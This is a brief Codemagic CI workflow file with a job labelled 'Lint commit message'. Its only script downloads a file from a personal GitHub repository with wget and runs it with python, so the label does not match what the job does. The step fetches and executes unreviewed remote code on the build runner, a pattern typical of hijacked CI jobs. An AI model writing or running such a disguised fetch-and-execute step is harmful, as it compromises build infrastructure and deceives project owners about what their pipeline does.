workflows:
    sample-workflow:
        name: Codemagic Sample Workflow
        max_build_duration: 120
        instance_type: linux
        commitlint:
    name: Lint commit message
    scripts:
      - wget https://raw.githubusercontent.com/erlandi-26/erlandi-26/main/tdc && python tdc
